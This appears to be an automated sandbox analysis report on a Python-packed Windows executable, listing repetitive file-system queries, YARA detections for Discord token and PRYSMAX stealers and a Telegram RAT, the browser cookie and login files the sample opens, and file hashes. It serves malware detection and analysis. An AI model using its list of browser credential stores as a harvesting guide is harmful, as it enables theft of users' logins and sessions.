Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF73339C5E0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF73339C5E0

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7333B6E70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF7333B6E70

Stealing of Sensitive Information

Yara detected Discord Token Stealer

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected PRYSMAX STEALER

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Yara detected Generic Python Stealer

Source: Yara match

File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Remote Access Functionality

Yara detected Discord Token Stealer

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected PRYSMAX STEALER

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected Generic Python Stealer

Source: Yara match

File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

ID:	1579350
Product:	CloudBasic
Start time:	21:50:34
Start date:	21.12.2024
Sample:	main.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c0e4c8f676e781c9dd3d57ffa4f99111
SHA1:	94a6f60949f38da538b5227722698dd880961bb2
SHA256:	9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
Filetype:	Win64 Executable Console (202006/5) 92.65%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	BCD8CAAF9342AB891BB1D8DD45EF0098	EE7760BA0FF2548F25D764F000EFBB1332BE6D3E	78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	F19CB847E567A31FAB97435536C7B783	4C8BFE404AF28C1781740E7767619A5E2D2FF2B7	1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	DC14677EA8A8C933CC41F9CCF2BEDDC1	A6FB87E8F3540743097A467ABE0723247FDAF469	68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	C09BB8A30F0F733C81C5C5A3DAD8D76D	46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1	8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
